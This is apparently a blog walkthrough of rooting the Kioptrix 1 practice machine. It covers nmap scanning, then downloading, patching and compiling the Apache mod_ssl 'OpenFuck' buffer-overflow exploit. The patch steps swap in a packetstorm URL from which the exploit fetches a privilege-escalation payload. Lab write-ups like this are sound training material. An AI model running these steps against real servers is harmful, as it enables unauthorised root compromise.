Rooting Kioptrix 1 Walkthrough

Overview

Kioptrix 1 B2R virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.

Vulnerabilities Exploited:

  • Apache mod_ssl < 2.8.7 OpenSSL Remote Buffer Overflow

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 1 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • gcc

Reconnaissance/Scanning

#netdiscover

Target VM IP Address: 192.168.8.106

nmap

Lets scan target box with namp to find open ports.

#nmap -p- -A –webxml -oX nmap-kioptrix1.xml 192.168.8.106

Exploitation

Apache 1.3.20 seem out dated, lets search for exploit.

Looks straight forward, lets download exploit on kali linux machine,

wget -O openFuck2.c https://www.exploit-db.com/download/764/

and customize according to instructions given at top of exploit in this link. http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/

These are cusomization steps.

Add these headers :

#include <openssl/rc4.h>

#include <openssl/md5.h>

2) Update the URL of the C file: Search for wget and replace the URL with this new one : http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Install libssl-dev lib

apt-get install libssl-dev

4) Update declaration of variables

Line 961, change :

unsigned char *p, *end;

By adding const :

const unsigned char *p, *end;

5) Compile then code and you’re done

To compile :

gcc -o openFuck2 /usr/share/exploitdb/exploits/unix/remote/764.c -lcrypto

and execute exploit

We are root! Congratulations!

Countermeasure

Update apache and mod ssl to latest version and apply available patches to latest version.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s